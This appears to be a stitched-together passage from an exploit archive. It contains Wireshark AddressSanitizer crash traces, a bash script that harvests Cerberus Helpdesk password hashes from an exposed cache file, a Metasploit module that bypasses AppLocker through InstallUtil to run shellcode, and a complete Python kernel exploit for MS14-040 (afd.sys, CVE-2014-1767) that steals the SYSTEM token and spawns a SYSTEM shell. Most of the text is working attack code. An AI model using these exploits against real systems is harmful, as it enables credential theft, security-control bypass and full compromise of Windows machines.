#2 0x7ff79055907d in pcapng_read wireshark/wiretap/pcapng.c:2564:35
#3 0x7ff7905d825b in wtap_read wireshark/wiretap/wtap.c:1253:7
#4 0x528036 in load_cap_file wireshark/tshark.c:3499:12
#5 0x51e4bc in main wireshark/tshark.c:2213:13
SUMMARY: AddressSanitizer: heap-use-after-free wireshark/wiretap/wtap_opttypes.c:161:20 in wtap_optionblock_free
Shadow bytes around the buggy address:
0x0c088000bad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000baf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000bb10: fa fa fa fa fa fa fa fa fa fa 00 00 00 00 00 fa
=>0x0c088000bb20: fa fa 00 00 00 00 00 fa fa fa fd fd[fd]fd fd fa
0x0c088000bb30: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb40: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb50: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 fa
0x0c088000bb60: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 fa
0x0c088000bb70: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==6853==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12173. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39529.zip
#!/bin/bash
#####################################################################################
# Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
# Date: 04.02.2016 #
# Exploit Author: asdizzle_ #
# Vendor Homepage: http://www.cerberusweb.com/ #
# Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
# Version: 5 - 6.7 #
# Tested on: Debian 8 / apache2 with cerb 5 #
#####################################################################################
# Prerequisites: #
# -At least one worker must be logged in #
# -/storage/tmp/ dir must be accessible #
# #
# If everything else fails try if there's directory listing in /storage/tmp #
# You might find attachments and even support tickets. #
#####################################################################################
url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
pre='devblocks' # If this doesn't work try 'zend'
echo "[*] Trying to fetch cache file"
cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
if [ -z "$cachechk" ];then
echo "[-] File not found."
exit
else
echo "[+] Found. Extracting..."
hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
if [ -z "$hashes" ];then
echo "[-] Hash extracting failed"
else
echo "[+] Extracting seems to have worked"
echo
echo "$hashes"
fi
fi
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Post::File
def initialize(info={})
super(update_info(info,
'Name' => 'AppLocker Execution Prevention Bypass',
'Description' => %q{
This module will generate a .NET service executable on the target and utilise
InstallUtil to run the payload bypassing the AppLocker protection.
Currently only the InstallUtil method is provided, but future methods can be
added easily.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Casey Smith', # Original AppLocker bypass research
'OJ Reeves' # MSF module
],
'Platform' => [ 'win' ],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'SessionTypes' => [ 'meterpreter' ],
'Targets' => [ [ 'Windows', {} ] ],
'DefaultTarget' => 0,
'DisclosureDate'=> 'Aug 3 2015',
'References' =>
[
['URL', 'https://gist.github.com/subTee/fac6af078937dda81e57']
]
))
register_options([
OptEnum.new('TECHNIQUE', [true, 'Technique to use to bypass AppLocker',
'INSTALLUTIL', %w(INSTALLUTIL)])])
end
# Run Method for when run command is issued
def exploit
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
if payload.arch.first == 'x64' && sysinfo['Architecture'] !~ /64/
fail_with(Failure::NoTarget, 'The target platform is x86. 64-bit payloads are not supported.')
end
end
# sysinfo is only on meterpreter sessions
print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
if datastore['TECHNIQUE'] == 'INSTALLUTIL'
execute_installutil
end
end
def execute_installutil
envs = get_envs('TEMP', 'windir')
dotnet_path = get_dotnet_path(envs['windir'])
print_status("Using .NET path #{dotnet_path}")
cs_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.cs"
exe_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.exe"
installutil_path = "#{dotnet_path}\\InstallUtil.exe"
print_status("Writing payload to #{cs_path}")
write_file(cs_path, generate_csharp_source)
register_files_for_cleanup(cs_path)
print_status("Compiling payload to #{exe_path}")
csc_path = "#{dotnet_path}\\csc.exe"
csc_platform = payload.arch.first == 'x86' ? 'x86' : 'x64'
vprint_status("Executing: #{csc_path} /target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
cmd_exec(csc_path, "/target:winexe /nologo /platform:#{csc_platform} /w:0 /out:#{exe_path} #{cs_path}")
print_status("Executing payload ...")
vprint_status("Executing: #{installutil_path} /logfile= /LogToConsole=false /U #{exe_path}")
client.sys.process.execute(installutil_path, "/logfile= /LogToConsole=false /U #{exe_path}", {'Hidden' => true})
register_files_for_cleanup(exe_path)
end
def get_dotnet_path(windir)
base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}"
paths = dir(base_path).select {|p| p[0] == 'v'}
dotnet_path = nil
paths.reverse.each do |p|
path = "#{base_path}\\#{p}"
if directory?(path) && file?("#{path}\\InstallUtil.exe")
dotnet_path = path
break
end
end
unless dotnet_path
fail_with(Failure::NotVulnerable, '.NET is not present on the target.')
end
dotnet_path
end
def generate_csharp_source
sc = payload.encoded.each_byte.map {|b| "0x#{b.to_s(16)}"}.join(',')
cs = %Q^
using System;
namespace Pop
{
public class Program { public static void Main() { } }
[System.ComponentModel.RunInstaller(true)]
public class Pop : System.Configuration.Install.Installer
{
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
private static UInt32 INFINITE = 0xFFFFFFFF;
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
public override void Uninstall(System.Collections.IDictionary s)
{
byte[] sc = new byte[] {#{sc}};
IntPtr m = VirtualAlloc(IntPtr.Zero, (UIntPtr)sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(sc, 0, m, sc.Length);
IntPtr id = IntPtr.Zero;
WaitForSingleObject(CreateThread(id, UIntPtr.Zero, m, id, 0, ref id), INFINITE);
}
}
}
^
cs
end
end
# Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
# Date: 2016-03-03
# Exploit Author: Rick Larabee
# Vendor Homepage: www.microsoft.com
# Version: Windows 7, 64 bit
# Tested on: Win7 x64
# afd.sys - 6.1.7601.17514
# ntdll.dll - 6.1.7601.17514
#
# CVE : CVE-2014-1767
# Category: Local Privilege Escalation
# References:
# http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation.pdf
# http://ricklarabee.blogspot.com/
# https://warroom.securestate.com/ms14-040-afd-sys-dangling-pointer-further-analysis/
# https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
# http://www.cvedetails.com/cve/CVE-2014-1767/
# https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/
#
# Greetz: PWN4GEPWN1E, SecurityMook
from ctypes import *
import socket, time, os, struct, sys
from ctypes.wintypes import HANDLE, DWORD
import platform
kernel32 = windll.kernel32
ntdll = windll.ntdll
Psapi = windll.Psapi
MEMRES = (0x1000 | 0x2000)
PAGEEXE = 0x40
Zerobits = c_int(0)
RegionSize = c_ulonglong(0x1000)
written = c_ulonglong(0)
FakeObjSize = 0x100
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
GENERIC_EXECUTE = 0x20000000
GENERIC_ALL = 0x10000000
INVALID_HANDLE_VALUE = -1
WSAGetLastError = windll.Ws2_32.WSAGetLastError
WSAGetLastError.argtypes = ()
WSAGetLastError.restype = c_int
SOCKET = c_int
WSASocket = windll.Ws2_32.WSASocketA
WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)
WSASocket.restype = SOCKET
closesocket = windll.Ws2_32.closesocket
closesocket.argtypes = (SOCKET,)
closesocket.restype = c_int
connect = windll.Ws2_32.connect
connect.argtypes = (SOCKET, c_void_p, c_int)
connect.restype = c_int
HalDispatchTable = c_uint64
class sockaddr_in(Structure):
_fields_ = [
("sin_family", c_short),
("sin_port", c_ushort),
("sin_addr", c_ulong),
("sin_zero", c_char * 8),
]
kernel32.WriteProcessMemory.argtypes = [c_ulonglong, c_ulonglong, c_char_p, c_ulonglong, POINTER(c_ulonglong)]
ntdll.NtAllocateVirtualMemory.argtypes = [c_ulonglong, POINTER(c_ulonglong), c_ulonglong, POINTER(c_ulonglong),c_ulonglong,c_ulonglong]
def find_driver_base(driver=None):
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
lpImageBase = (c_ulonglong * 1024)()
lpcbNeeded = c_longlong()
Psapi.GetDeviceDriverBaseNameA.argtypes = [c_longlong, POINTER(c_char), c_uint32]
else:
#if process_is_wow64():
# raise RuntimeError('python running in WOW64 is not supported')
lpImageBase = (c_ulong * 1024)()
lpcbNeeded = c_long()
driver_name_size = c_long()
driver_name_size.value = 48
Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))
for base_addr in lpImageBase:
driver_name = c_char_p('\x00' * driver_name_size.value)
if base_addr:
Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value)
if driver == None and driver_name.value.lower().find("krnl") != -1:
return (base_addr, driver_name.value)
elif driver_name.value.lower() == driver:
return (base_addr, driver_name.value)
return None
def get_haldispatchtable():
#https://github.com/zeroSteiner/mayhem/blob/master/mayhem/exploit/windows.py
if platform.architecture()[0] == '64bit':
kernel32.LoadLibraryExA.restype = c_uint64
kernel32.GetProcAddress.argtypes = [c_uint64, POINTER(c_char)]
kernel32.GetProcAddress.restype = c_uint64
(krnlbase, kernelver) = find_driver_base()
hKernel = kernel32.LoadLibraryExA(kernelver, 0, 1)
halDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable')
halDispatchTable -= hKernel
halDispatchTable += krnlbase
return halDispatchTable
def CreateBuffer1(inbuf1addr):
print "[+] Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr)
inbuf1size = 0x40
targetsize = 0x100
virtualAddress = 0x13371337
mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff)
inbuf1 = "\x41" * 0x20
inbuf1 += struct.pack("Q", virtualAddress) #0x1a
inbuf1 += struct.pack("Q", mdlsize)
inbuf1 += "\x42" * 4
inbuf1 += "\x43" * 4
inbuf1 += "\x01\x00\x00\x00"
inbuf1 += "\x00\x00\x00\x00"
inbuf1 += "\x00" * (inbuf1size - len(inbuf1))
baseadd = c_ulonglong(0x1001)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
wpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written))
def CreateBuffer2(inbuf2addr):
print "[+] Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr)
inbuf2size = 0x18
addrforbuf2 = 0x0AAAAAAA
inbuf2 = struct.pack("Q", 0x1)
inbuf2 += struct.pack("Q", addrforbuf2)
inbuf2 += "\x00" * (inbuf2size -len(inbuf2))
baseadd = c_ulonglong(inbuf2addr+1)
dwStatus = ntdll.NtAllocateVirtualMemory(-1,
byref(baseadd),
0x0,
byref(RegionSize),
MEMRES,
PAGEEXE)
kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))
def CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory):
print "[+] Print creating fakeobject at ", hex(fakeobjectaddr)
fakeobject2addr = setinfoworkerfactory - 0x18
fakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite)
fakeobj2size = len(fakeobject2)
kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))
objhead = ("\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x08\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
fakeobject = objhead
fakeobject += struct.pack("Q", fakeobject2addr) + "\x41"*96
fakeobject += "\x42" * (FakeObjSize - len(fakeobject))
kernel32.WriteProcessMemory(-1, fakeobjectaddr, fakeobject, FakeObjSize, byref(written))
def main():
print "[+] creating socket..."
sock = WSASocket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, None, 0, 0)
if sock == -1:
print "[-] no luck creating socket!"
sys.exit(1)
print "[+] got sock 0x%x" % sock
addr = sockaddr_in()
addr.sin_family = socket.AF_INET
addr.sin_port = socket.htons(135)
addr.sin_addr = socket.htonl(0x7f000001)
connect(sock, byref(addr), sizeof(addr))
print "[+] sock connected."
print "[+] fill kernel heap"
rgnarr = []
nBottomRect = 0x02aaaaaa
while(1):
hrgn = windll.gdi32.CreateRoundRectRgn(0,0,1,nBottomRect,1,1)
if hrgn == 0:
break
rgnarr.append(hrgn)
print ".",
print "\n[+] GO!"
HalDispatchTable = get_haldispatchtable()
print "[+] HalDispatchTable address:", hex(HalDispatchTable)
# Win7 - x64
(halbase, dllname) = find_driver_base("hal.dll")
OS = "7"
if OS == "7":
HaliQuerySystemInformation = halbase+0x398e8 # Offset for win7 x64
_KPROCESS = "\x70"
_TOKEN = "\x08\x02"
_UPID = "\x80\x01"
_APLINKS = "\x88\x01"
print "[+] HaliQuerySystemInformation:", hex(HaliQuerySystemInformation)
IoStatus = c_ulonglong()
IoStatusBlock = c_ulonglong()
addrSetInfoWorkerFactory = 0x2218
firstWriteAddr = HalDispatchTable + 0x8 - 0x2C
secondWriteAddr = firstWriteAddr + 0x4
thirdWriteAddr = firstWriteAddr + 0x1
shellcode_address = c_ulonglong
shellcode_address = 0x0000000000002500
what_address = 0x0000250800002500
what_part1 = what_address & 0xfffffff
what_part2 = what_address >> 32 & 0xfffffff
inbuf1 = 0x1000
inbuf2 = 0x2000
hWF = c_ulonglong(0)
FakeWorkerFactoryADDR = 0x2100
CreateBuffer1(inbuf1)
CreateBuffer2(inbuf2)
CreateFakeObject(firstWriteAddr, FakeWorkerFactoryADDR, addrSetInfoWorkerFactory)
print ""
print ""
print "[*] Trigger IOCTL 0x1207f (afdTransmitFile) to setup the memory "
print "[*] structures for phase 2 and fil the freed space with a "
print "[*] WorkerFactory Object"
raw_input("[+] Press Enter to trigger phase 1")
ntdll.ZwDeviceIoControlFile.argtypes = [c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, POINTER(c_ulonglong),
c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
status = ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x1207f, inbuf1, 0x40, 0x0, 0x0)
kernel32.CreateIoCompletionPort.argtypes = [c_ulonglong,c_ulonglong,c_ulonglong,c_ulonglong]
CompletionPort = HANDLE(kernel32.CreateIoCompletionPort( INVALID_HANDLE_VALUE, 0, 0, 0))
ntdll.ZwCreateWorkerFactory.argtypes = [POINTER(c_ulonglong), c_ulonglong, c_ulonglong, c_void_p, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong, c_ulonglong]
ntdll.ZwCreateWorkerFactory(byref(hWF),GENERIC_ALL,0,CompletionPort,INVALID_HANDLE_VALUE,0,0,0,0,0)
hWFaddr = hWF
padding = "\x90"*8
HalDispatchTable0x8 = HalDispatchTable + 0x8
sc_pointer = struct.pack("Q", shellcode_address+0x10)
sc_pointer += struct.pack("Q", 0x25)
restore_ptrs = "\x41\x51" +\
"\x41\x52" +\
"\x41\x53" +\
"\x49\xb9" + struct.pack("Q", HaliQuerySystemInformation) +\
"\x49\xba" + struct.pack("Q", HalDispatchTable0x8) +\
"\x4d\x89\x0a"
tokenstealing = "\x65\x4C\x8B\x0C\x25\x88\x01\x00\x00" +\
"\x4D\x8B\x89" + _KPROCESS + "\x00\x00\x00" +\
"\x4D\x89\xCA" +\
"\x4D\x8B\x89" + _APLINKS + "\x00\x00" +\
"\x49\x81\xE9" + _APLINKS + "\x00\x00" +\
"\x49\x83\xB9" + _UPID + "\x00\x00\x04" +\
"\x75\xe8" +\
"\x4D\x8B\x89" + _TOKEN + "\x00\x00" +\
"\x4D\x89\x8A" + _TOKEN + "\x00\x00"
fixobjheaders = "\x4d\x8b\x92\x00\x02\x00\x00" +\
"\x4d\x89\xd1" +\
"\x4d\x8b\x12" +\
"\x41\xbb" + struct.pack("L", hWF.value)+\
"\x41\x83\xe3\xfc" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xdb" +\
"\x4d\x01\xda" +\
"\x49\xc7\x02\x00\x00\x00\x00" +\
"\x49\x83\xc1\x58" +\
"\x4d\x89\xca" +\
"\x4d\x8b\x09" +\
"\x49\x83\xe9\x01" +\
"\x4d\x89\x0a" +\
"\x41\x5b" +\
"\x41\x5A" +\
"\x41\x59" +\
"\xc3"
shellcode = sc_pointer + padding + restore_ptrs + tokenstealing + fixobjheaders
shellcode_size = len(shellcode)
print "\n\n[+] Writing Shellcode at address: ", hex(shellcode_address)
kernel32.WriteProcessMemory(-1, shellcode_address, shellcode, shellcode_size, byref(written))
print "\n\n[*] Triggering IOCTL 0x120c3 (afdTransmitPackets) to free the"
print "[*] WorkerFactory object created above and fill the freed object"
print "[*] with a user controlled object to perform the necessary overwrites"
raw_input("[+] Press Enter to trigger phase 2")
### Trigger 2
## afd!AfdTransmitPackets
ntdll.ZwDeviceIoControlFile(sock,0x0,0x0,0x0,byref(IoStatusBlock),0x120c3, inbuf2, 0x18, 0x0, 0x0)
ntdll.ZwQueryEaFile(INVALID_HANDLE_VALUE, byref(IoStatus), None, 0, False, FakeWorkerFactoryADDR, FakeObjSize-0x04, None, False)
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part1, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", secondWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4)
kernel32.WriteProcessMemory(-1, addrSetInfoWorkerFactory, struct.pack("Q", thirdWriteAddr), 0x8, byref(written))
ntdll.ZwSetInformationWorkerFactory(hWF, 8, what_part2, 0x4) ;
inp = c_long()
out = c_long()
inp = 0x1337
qip = ntdll.NtQueryIntervalProfile(inp, byref(out))
print "[*] Spawning a SYSTEM shell..."
os.system("cmd.exe /K cd c:\\windows\\system32")
if __name__ == "__main__":
if platform.architecture()[0] == '64bit':
main()
else:
print "Please use a 64 bit version of python"
sys.exit()
Source: https://code.google.com/p/google-security-research/issues/detail?id=648
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==7855==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000005676c18 at pc 0x000001ab09d2 bp 0x7ffc9ce376b0 sp 0x7ffc9ce376a8
READ of size 8 at 0x000005676c18 thread T0
#0 0x1ab09d1 in dissect_ber_set wireshark/epan/dissectors/packet-ber.c:2588:64
#1 0x198e7c7 in dissect_ansi_tcap_T_paramSet wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:189:12
#2 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#3 0x198e652 in dissect_ansi_tcap_T_parameter_03 wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:210:12
#4 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#5 0x198b2f7 in dissect_ansi_tcap_Reject wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:227:12
#6 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#7 0x198aee2 in dissect_ansi_tcap_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:256:12
#8 0x1abba52 in dissect_ber_sq_of wireshark/epan/dissectors/packet-ber.c:3490:9
#9 0x1abbe2f in dissect_ber_sequence_of wireshark/epan/dissectors/packet-ber.c:3521:12
#10 0x198ae17 in dissect_ansi_tcap_SEQUENCE_OF_ComponentPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:270:12
#11 0x1a966a7 in dissect_ber_tagged_type wireshark/epan/dissectors/packet-ber.c:691:9
#12 0x19898ac in dissect_ansi_tcap_ComponentSequence wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:280:12
#13 0x1aae8bc in dissect_ber_sequence wireshark/epan/dissectors/packet-ber.c:2400:17
#14 0x198e887 in dissect_ansi_tcap_TransactionPDU wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:145:12
#15 0x1988ded in dissect_ansi_tcap_T_queryWithPerm wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:134:12
#16 0x1ab47f4 in dissect_ber_choice wireshark/epan/dissectors/packet-ber.c:2898:21
#17 0x1988b30 in dissect_ansi_tcap_PackageType wireshark/epan/dissectors/../../asn1/ansi_tcap/ansi_tcap.cnf:173:12
#18 0x1988830 in dissect_ansi_tcap wireshark/epan/dissectors/../../asn1/ansi_tcap/packet-ansi_tcap-template.c:385:5
#19 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#21 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#22 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#23 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#24 0x16c3f24 in dissect_tcap wireshark/epan/dissectors/../../asn1/tcap/packet-tcap-template.c:2004:14
#25 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#26 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#27 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#28 0x11d6632 in dissect_sccp_data_param wireshark/epan/dissectors/packet-sccp.c:2346:31
#29 0x11d47a1 in dissect_sccp_parameter wireshark/epan/dissectors/packet-sccp.c:2559:5
#30 0x11d5169 in dissect_sccp_variable_parameter wireshark/epan/dissectors/packet-sccp.c:2640:3
#31 0x11cec1e in dissect_sccp_message wireshark/epan/dissectors/packet-sccp.c:2951:5
#32 0x11cc3f9 in dissect_sccp wireshark/epan/dissectors/packet-sccp.c:3402:3
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#37 0xefae51 in dissect_mtp3_payload wireshark/epan/dissectors/packet-mtp3.c:647:8
#38 0xef8466 in dissect_mtp3 wireshark/epan/dissectors/packet-mtp3.c:767:3
#39 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#41 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0xaefba8 in call_dissector wireshark/epan/packet.c:2692:9
#44 0x2da26b4 in dissect_protocol_data_1_parameter wireshark/epan/dissectors/packet-m2ua.c:507:3
#45 0x2da11b2 in dissect_parameter wireshark/epan/dissectors/packet-m2ua.c:952:5
#46 0x2da006b in dissect_parameters wireshark/epan/dissectors/packet-m2ua.c:1026:5
#47 0x2d9fb58 in dissect_message wireshark/epan/dissectors/packet-m2ua.c:1041:3
#48 0x2d9fa96 in dissect_m2ua wireshark/epan/dissectors/packet-m2ua.c:1058:3
#49 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#50 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#51 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#52 0x39012a2 in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#53 0x38f7d37 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#54 0x38f0ac8 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#55 0x38ed8e6 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#56 0x38eb79f in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#57 0x38e95d5 in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#58 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#59 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#60 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#61 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#62 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#63 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#64 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#65 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#66 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#67 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
